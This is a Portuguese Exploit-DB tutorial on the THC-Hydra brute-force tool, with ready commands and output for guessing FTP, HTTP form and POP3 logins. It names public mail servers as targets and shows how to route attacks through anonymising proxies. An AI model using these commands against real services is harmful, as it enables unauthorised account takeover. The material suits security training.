[Portuguese] Tutorial Thc-Hydra

EDB-ID:

13672

CVE:

N/A


Author:

mdh3ll

Type:

papers


Platform:

AIX

Date:

2010-04-13


 _   _               _               _           
| |_| |__   ___     | |__  _   _  __| |_ __ __ _ 
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
 \__|_| |_|\___|    |_| |_|\__, |\__,_|_|  \__,_|
                           |___/    TUTORIAL BASICO THC-HYDRA [PT-BR]


___________________________________________________________________________________
- Por : MDH3LL
- Contato :	mdh3ll@gmail.com
- Data 10/04/2010
__________________________________________________________________________________


INDICE :
___________________________________________________________________________________
-0x00 - Instalando THC-HYDRA no (Windows XP).
-0x01 - Executando.
-0x02 - Opções.
-0x03 - Exemplos{
 -- Exemplo (1) FTP
 -- Exemplo (2) http-head
 -- Exemplo (3) http-post-form
 -- Exemplo (4) POP3
-0x04 - Proxy.
___________________________________________________________________________________

* THC-Hydra:Open Source/Multiplataforma/
* Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
* O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/

Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de 
senhas e nomes de usuários ate chegar ao seu objetivo obvio.

Protocolos suportados atualmente na versão 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
===================================================================================
[0x00] Instalando THC-HYDRA no (Windows XP) :
===================================================================================
O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.

-> Criar uma variável de ambiente em :
painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
exemplo: C:\hydra-5.4-win;

===================================================================================
[0x01] Executando :
===================================================================================
Rode 'hydra' no prompt de comandos para chamar o programa.

///////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
 [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
 server service [OPT]

Options:
  -R        restore a previous aborted/crashed session
  -S        connect via SSL
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE try password PASS, or load several passwords from FILE
  -e ns     additional checks, "n" for null password, "s" try login as pass
  -C FILE   colon seperated "login:pass" format, instead of -L/-P options
  -M FILE   server list for parallel attacks, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f        exit after the first found login/password pair (per host if -M)
  -t TASKS  run TASKS number of connects in parallel (default: 16)
  -w TIME   defines the max wait time in seconds for responses (default: 30)
  -v / -V   verbose mode / show login+pass combination for each attempt
  server    the target server (use either this OR the -M option)
  service   the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
  OPT       some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e 
as opções seguidas de comentários.

===================================================================================
[0x02] Opções :
===================================================================================

 -R Restaura sessões abordadas/quebradas.
 -S Conexão segura usando SSL caso seja necessário.
 -s Especifica qual porta o hydra vai estabelecer a conexão.
 -l Nome|login da vitima.
 -L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
 -p Especifica senha única.
 -P Carrega uma lista com senhas.(1 por linha)
 -e ns adcional 'n' testa senha em branco || adicional 's' testa user como pass.
 -C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
 -M Carrega lista de servidores alvos.(1 por linha)
 -o Salva as senhas encontradas dentro do arquivo que você especificar.
 -f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
 -t Limita o numero de solicitações por vez.(default: 16)
 -w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
 -v / -V Modo verbose do programa. 'V' mostra todas tentativas.

Server: Servidor alvo. 
Exemplos: 
 127.0.0.1
 localhost
 pop.gmail.com
 pop.mail.yahoo.com.br 
 pop3.live.com 

Service: Protocolo||Serviço que sera chamado|usado.
Exemplos:
 pop3
 ftp
 smtp
 vnc 
 imap
 http-head
 http-post-form

===================================================================================
[0x03] Exemplos:
===================================================================================
Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial. 

Exemplo (1) FTP
===================================================================================
Sintaxe:
-----------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
-----------------------------------------------------------------------------------

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: root   password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

*[21][ftp] host: 127.0.0.1   login: root   password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
pertencente ao usuário root.


Exemplo (2) http-head
===================================================================================
Sintaxe:
-----------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
-----------------------------------------------------------------------------------

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: root   password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'.

Dentro do arquivo foi escrito as seguintes linhas pelo programa:
-----------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
 pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1   login: root password: Est2yu
-----------------------------------------------------------------------------------
/xammp/ é o caminho/path -> http://localhost/xammp/


Exemplo (3) http-post-form
===================================================================================
Sintaxe:
-----------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>"
-----------------------------------------------------------------------------------

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-> Para criar esta sintaxe tive que olhar o código da pagina >>
-----------------------------------------------------------------------------------
<form action="index.php" method="POST">
<input type="text" name="nome" /><BR><br>
<input type="password" name="senha" /><br><br>
<input type="submit" name="boo" value="Enviar">
<br>
</form>
-----------------------------------------------------------------------------------

 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|                                                          |
|                                                          |
|                                                          |
|           _____________________________________          |
|          |               nome                  |         |
|          |_____________________________________|         |
|           _____________________________________          |
|          |               senha                 |         |
|          |_____________________________________|         |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|

-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use o complemento 'live HTTP headers' para Firefox que com toda certeza facilitara bastante sua vida.
-> Quando envio dados errados a pagina me retorna 'invalido' no titulo.
-----------------------------------------------------------------------------------
<title>invalido</title>
-----------------------------------------------------------------------------------

Complete ->
-----------------------------------------------------------------------------------
hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
"[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]"
-----------------------------------------------------------------------------------

Completo ->
-----------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>"
-----------------------------------------------------------------------------------

Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
-> ^USER^ = admin e ^PASS^ = $_ <-


Outro exemplo -> http://localhost/login/login.html
-> Codigo fonte da pagina >>
-----------------------------------------------------------------------------------
<form action="login_vai.php" method="post"><br>
Login: <input type="text" name="login"><br>
Senha: <input type="password" name="senha"><br>
<input type="submit" value="OK!">
</form>
-----------------------------------------------------------------------------------

Sintaxe:
-----------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
-----------------------------------------------------------------------------------

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


Exemplo (4) POP3
===================================================================================
Sintaxe:
-----------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
-----------------------------------------------------------------------------------

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com   login: xxxxxx@xx.com.br password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


===================================================================================
[0x04] Proxy:
===================================================================================

Proxy web:
-----------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
-----------------------------------------------------------------------------------

Para qualquer outro use : HYDRA_PROXY_CONNECT
-----------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
-----------------------------------------------------------------------------------

Com autentificação :
-----------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
-----------------------------------------------------------------------------------